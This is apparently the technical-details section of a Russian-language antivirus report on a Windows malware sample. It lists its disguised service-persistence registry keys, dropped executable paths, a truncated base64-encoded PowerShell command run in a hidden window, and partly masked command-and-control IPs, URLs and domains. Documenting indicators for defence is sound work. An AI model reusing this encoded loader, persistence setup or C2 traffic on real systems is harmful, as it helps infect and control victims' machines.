Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\msv1_0] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\msv1_0] 'ImagePath' = '"%WINDIR%\SysWOW64\dxdiag\msv1_0.exe"'
- 'msv1_0' "%WINDIR%\SysWOW64\dxdiag\msv1_0.exe"
- 'msv1_0' %WINDIR%\SysWOW64\dxdiag\msv1_0.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAFMAdgAgAEcAbQBiACAAIAAoAFsAVABZAFAARQBdACgAIgB7ADEAfQB7ADUAfQB7ADQAfQB7ADIAfQB7ADAAfQB7ADMAfQAiAC0ARgAnAFQAJwAsACcAUwBZAHMAdABFACcALAAnAGUAQwAnACwAJwBvAFIAWQAnACwAJw...
- %HOMEPATH%\ssu_x6q\oqs13h6\o1zaymn0.exe
- %HOMEPATH%\ssu_x6q\oqs13h6\o1zaymn0.exe
- %HOMEPATH%\ssu_x6q\oqs13h6\o1zaymn0.exe в %WINDIR%\syswow64\dxdiag\msv1_0.exe
- %HOMEPATH%\ssu_x6q\oqs13h6\o1zaymn0.exe
- '17#.#07.79.214':8080
- http://ba#####.tranbaocuong.top/application/h5c/
- http://17#.##7.79.214:8080/w5DQiT6PsZrwF97/AoTEgF0YGT/ via 17#.#07.79.214
- DNS ASK ju####gphones.com
- DNS ASK gk#####msnamakkal.xyz
- DNS ASK ba#####.tranbaocuong.top
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAFMAdgAgAEcAbQBiACAAIAAoAFsAVABZAFAARQBdACgAIgB7ADEAfQB7ADUAfQB7ADQAfQB7ADIAfQB7ADAAfQB7ADMAfQAiAC0ARgAnAFQAJwAsACcAUwBZAHMAdABFACcALAAnAGUAQwAnACwAJwBvAFIAWQAnACwAJw...' (со скрытым окном)